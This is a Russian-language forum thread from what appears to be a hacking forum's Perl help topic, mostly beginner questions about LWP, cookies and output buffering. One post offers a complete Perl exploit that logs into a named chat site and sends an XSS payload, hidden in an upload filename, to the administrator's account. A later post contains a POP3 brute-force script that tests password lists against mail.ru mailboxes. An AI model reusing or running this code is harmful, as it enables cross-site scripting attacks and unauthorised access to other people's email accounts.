[Perl] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    ?
    use LWP;
    use HTTP::Cookies;
    use strict;

    my $url='www.perl.com/login';
    my $ua=LWP::UserAgent->new;
    my $cookie_jar=HTTP::Cookies->new;
    $ua->cookie_jar($cookie_jar);

    my $req=$ua->post($url,
    ['username' => 'ZET36',
    'password' => 'justanotherperlhacker',
    ]);
    $cookie_jar->extract_cookies($req);
     
    1 person likes this.
  2. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    спасибо t00th но когда я пытаюсь вывести ответ то выводит

    скрипт запускал со своего компа , может я что не так сделал?

    Code:
    use LWP;
    use HTTP::Cookies;
    
    
    my $url='www.win.mail.ru/cgi-bin/auth';
    my $ua=LWP::UserAgent->new;
    my $cookie_jar=HTTP::Cookies->new;
    $ua->cookie_jar($cookie_jar);
    
    my $req=$ua->post($url,
    [Login => 'login', Domain => 'mail.ru', Password => 'pass', Mpopl => '274219236']);
    $cookie_jar->extract_cookies($req);
    
    print $req->content;
    
    $F = <STDIN>;
    и я так не понял в какую переменную нужно прописывать куки (которые я хочу отправить с запросом) а сдесь помему приведён пример чтения куков после запроса
     
    #482 ZET36, 30 May 2008
    Last edited: 30 May 2008
  3. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://search.cpan.org/~gaas/libwww-perl-5.812/lib/HTTP/Cookies.pm

     
  4. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    А http куда дел?
    http://win.mail.ru/cgi-bin/auth
     
  5. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    slider спасибо теперь работает
     
  6. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    а вот в какую переменную прописывать куки ?( я хочу тправить пост запрос с куами . вот например)

    Code:
    POST http://mail.rambler.ru/script/auth.cgi HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://www.rambler.ru/
    Accept-Language: ru
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709))
    Host: mail.rambler.ru
    Content-Length: 41
    Pragma: no-cache
    Cookie: ruid=UH0LBmW3KkhuFgEAARCXgwB=
    
    domain=rambler.ru&url=7&login=zz&passw=zz
    
    куда ruid=UH0LBmW3KkhuFgEAARCXgwB= прописывать?
     
  7. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    ZET36

    Так они ж у тебя и так прописаны.

    Code:
    POST http://mail.rambler.ru/script/auth.cgi HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://www.rambler.ru/
    Accept-Language: ru
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709))
    Host: mail.rambler.ru
    Content-Length: 41
    Pragma: no-cache
    [B]Cookie: ruid=UH0LBmW3KkhuFgEAARCXgwB=[/B]
    
    domain=rambler.ru&url=7&login=zz&passw=zz
     
  8. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Solide Snake это запрос из навископа, я хочу отправить точно такой же запрос через перл, куда в скрипт мне прописывать куки я спрашивал
     
  9. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    ZET36
     
  10. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    krypt3r хых прежде чем задать этот вопрос я гуглил и просмотрел кучу статей типо
    http://cylib.iit.nau.edu.ua/Books/Prog/Perl/ActivePerl_Help/site/lib/HTTP/Cookies.html

    но в английском я не очень силён, и при том не так хорошо знаю перл что бы разобраься в отрывках кода, поэтому и задал вопрос что бы посмотреть как это выглядит на примере
     
    1 person likes this.
  11. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    тоесть куки которые я хочу отправить с запросом должны быть записаны в файл

    Code:
    file => "файл с куками.txt" 
    ?
     
  12. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    Хм...а в чем проблема просто, напрямую в файл писать? Или я чето не понял? =\
     
  13. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    biophreak конешно это не проблема , содержимое файла вывести в переменную массива очень легко, просто я поинтересовался правильно ли я понял содержимое скрипта
     
  14. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    А сорри, не увидел, да, действительно, юзать file => "файл с куками.txt" будет имхо правильнее :)
     
  15. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Кхмм.... когда то меня мучал этот же вопрос.....
    могу дать как пример.. на изучение один сплойт для чата "h t t p : / / s i m . m d"
    который я писал для себя, для тренеровок ... багу уже конечно прикрыли.. но я надеюсь что реализация
    всего этого ... будет кому то инересна.... хех.. а возможно для кого то станет хорошей тренировочной куклой

    PHP:
    #!/usr/bin/perl

    ########################################
    ## Сoded by slider
    ## http://forum.antichat.ru
    ## _____________________
    ## Victim:
    ## http://sim.md/
    ########################################

    use IO::Socket;
    use 
    LWP::UserAgent;
    use 
    HTTP::Cookies

    #######_АВТОРИЗАЦИЯ_#######
    $a_login 'Логин';
    $a_pass 'Пароль';
    #########################
    $victim 'Администратор';     # НИК ЖЕРТВЫ
    $ploent '<BODY ONLOAD=alert("XSS")>';
    #########################

    $ua LWP::UserAgent->new;
    my $req HTTP::Request->new(POST => 'http://sim.md/login.php');

    my $cookie_jar HTTP::Cookies->new;
    $ua->timeout(60);
    $ua->cookie_jar($cookie_jar);
    $req->content("login=$a_login&password=$a_pass&tochat=1");
    $req->content_type('application/x-www-form-urlencoded');
    $req->referer('http://sim.md/');
    my $res $ua->request($req);

    if (
    $res->status_line=~'302'==1
    {print 
    "[~] Auth: OK\n"};


    $req HTTP::Request->new(GET => 'http://sim.md/chat.php');
    $req->header('Accept' => 'text/html');
    $req->referer('http://sim.md/login.php');
    $res $ua->request($req);

    $cook $cookie_jar->as_string;
    @
    res_arr split(/\n/, $cook);
    $cookies '';
    foreach (@
    res_arr)
    {if (/^
    Set-Cookie3: ([^;]*);(.*)/){
    $cookies = $1chomp($cookies);}}

    $a=q(POST http://sim.md/records.php HTTP/1.0
    Acceptimage/gifimage/x-xbitmapimage/jpegimage/pjpegapplication/x-shockwave-flash, */*
    Referer: http://sim.md/records.php
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d7186135506dc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
    Host: sim.md
    Content-Length: 812
    Pragma: no-cache
    Cookie: );$b=qq($cookies

    -----------------------------7d7186135506dc
    Content-Disposition: form-data; name="action"

    send
    -----------------------------7d7186135506dc
    Content-Disposition: form-data; name="name"

    $victim
    -----------------------------7d7186135506dc
    Content-Disposition: form-data; name="msg"


    -----------------------------7d7186135506dc
    Content-Disposition: form-data; name="file"; filename="$ploent"
    Content-Type: application/octet-stream



    -----------------------------7d7186135506dc
    Content-Disposition: form-data; name="forward"


    -----------------------------7d7186135506dc--

    );
    $pack=$a.$b;

    my $h_sock = new IO::Socket::INET (PeerAddr => "sim.md", PeerPort => '80', PeerProto => 'TCP' ) or die "[-] Exploit Failed";
    print $h_sock $pack; 
    print "[~] Success ...\n";
     
    1 person likes this.
  16. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Кстать присмотритесь к баге... она много где поможет вам.... ;)
     
  17. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Извеняйте судари, это опять я и опять с ламерским вопросом))
    как организовать задержку в цикле?

    в гугле везде натыкался на sleep

    Code:
    for ($i = 1; $i < 5; $i++)
    {
    print $i;
    sleep 3;
    }
    
    но в этом варианте через 15 секунд сразу выводит 12345
    а мне нужно что бы через каждые 3 секунды выводило переменную $i
     
  18. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    $| = 1;
    перед циклом
     
    #498 Piflit, 31 May 2008
    Last edited: 1 Jun 2008
  19. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Piflit спасибо , всё отлично
     
  20. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Здравствуйте!
    Заранее извиняюсь за (может быть) глупый вопрос!
    Почему данный скрипт на Локлке работает а на сервере нет???

    Code:
    #!usr/bin/perl
    
    use Net::POP3;
    
    $Fpass   = 'passwords.txt';
    $Femails = 'emails.txt';
    
    $finds   = 0;
    
    open($emails, $Femails);
    while(<$emails>)
    {
    	chompt;
    	$email = $_;
    
    	open($passwords, $Fpass);
    	while(<$passwords>)
    	{
    		chompt;
    		$pass = $_;
    
    		$pop = Net::POP3->new('pop.mail.ru');
    		$pop = Net::POP3->new('pop.mail.ru', Timeout => 60);		
    
    		if($pop->login($email, $pass)>0)
    		{		
    			print  "Good PASSSSSSSSSSSSSSSSSSSSSSSSS\n".
    				   "[>]Email:".$email."\n".
    				   "[>]Password:".$pass."\n";
    		}
    		else
    		{
    			print "[>]BAD Password:".$pass;
    		}
    	}
    	$pop->quit;
    	Close($passwords);
    }
    Close($emails);
    Ошибка:
    Code:
    Can't call method "login" on an undefined value at hello.pl line 29, <$passwords> line 1.
    П.С.
    Сильно не бейте я только учусь!
    :)
     
Thread Status:
Not open for further replies.